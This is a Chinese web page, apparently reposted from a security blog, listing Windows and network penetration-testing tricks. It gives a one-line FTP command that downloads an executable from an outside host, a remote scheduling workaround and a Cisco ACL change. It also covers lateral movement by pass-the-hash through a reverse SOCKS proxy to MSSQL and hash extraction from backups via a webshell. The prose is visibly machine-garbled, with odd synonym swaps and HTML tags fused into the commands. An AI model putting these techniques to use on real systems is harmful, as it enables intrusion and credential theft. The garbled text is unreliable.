|
|
|
联系客服020-83701501

渗透测试技巧分享

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
渗透测试技妙手段格式分享

1.AT時提醒綁定句柄無效

經常碰到的這個問題,百度搜索的全体都沒一個能解決的。

正確的解決辦法是先在所在欄\\1.1.1.1 得到對方機器名,比如ADMINPC,然後,CMD

Default
12 echo 1.1.1.1 ADMINPC &gt;&gt;C:\windows\system32\drivers\etc\hosts<span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">然後即也许at了,不再會提醒句柄無效了。</span>

後記:其實也不需要對方的機器名,隨便echo 一個字符包办機器名即可。

2.ftp 一句話download

早年但凡一個一個echo,然後ftp-s,很不轻易,用下面的辦法吧

Default
12 echo open 10.0.0.1 &gt; o&amp;echo user 1 1 &gt;&gt; o &amp;echo get 3389.exe &gt;&gt; o &amp;echo quit &gt;&gt; o &amp;ftp -n -s:o &amp;del /F /Q o<strong style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">3.針對VISTA以上作業系統禁用NTHASH</strong>

高級系統默認但凡禁止了LMHASH,在滲透途中是件很不轻易的事,按照下圖也许啟動LMHASH,不過需要变卦密碼后见效,若是用戶顽固卦密碼,LMHASH不會儲存,適用于比較飞快的目標,沒事天天改密碼的類型。這辦法適用於無WCE的時代.

捉拿.gif(缩略图)

bhgif

4. 修改cisco access list 警悟繁瑣的”佛跳牆”過程

ssh 登陸IP,x.x.x.x

登陸

Default
12345678 enIPE_CISCO#show access-list 查抄下要配置的list 比如需要訪問的服務器在VLAN103IPE_CISCO#configIPE_CISCO#terminalIPE_CISCO#access-list 103 permit host 10.1.6.66 //允許這個IP訪問VLAN103局部的伺服器IPE_CISCO#int vlan 103IPE_CISCO#ip access-group 103 outIPE_CISCO#exit

5.BKF文件的哄骗

Webshell 環境下,提權無門,發現一BKF,Copy Downlaod,虛擬機還原,WINPE 替換shift,get hash

然後去試試目標的pass.

6.基於替換系統hash的SQL 入侵

已知目標系統HASH:

Default
1 administrator:zhu:00000000000000000000000000000000:4A59CF37F6xxxxxx

系統OS:2003,SQLSERVER 2008,目測該hash超過14位。(2003 默認為LMHASH,密碼超過14位則全000000000或者AA3DXXX)
已有网站shell,提權無門,則通過Htran 反彈一條sock5代理,外地WCE替換為目標HASH,行使sock5代理連接MSSQL,認證選擇NT。

連上,实现。

7.留心Command.com?

這個呼吁具有好久了在遙遠的WIN95~WIN2003一直具有著,一直被忽略的對象,其實,它也能包办CMD。

8.當ipc$碰到帶“號密碼時

Default
12 password is:O*"#~)GbU[xnet use \\127.0.0.1 "O*\"#~)GbU[x" /u:administrator

“號前加\即可解決問題。

更多渗透测试技妙手段格式也许参考《渗透技妙手段格式 》

本文作者hack520 link:http://www.freebuf.com/articles/system/7331.html

本文由Internet安然攻防研究室(www.91ri.org)动静安然小组收集整顿,转载请阐明来由。

数安新闻+更多

证书相关+更多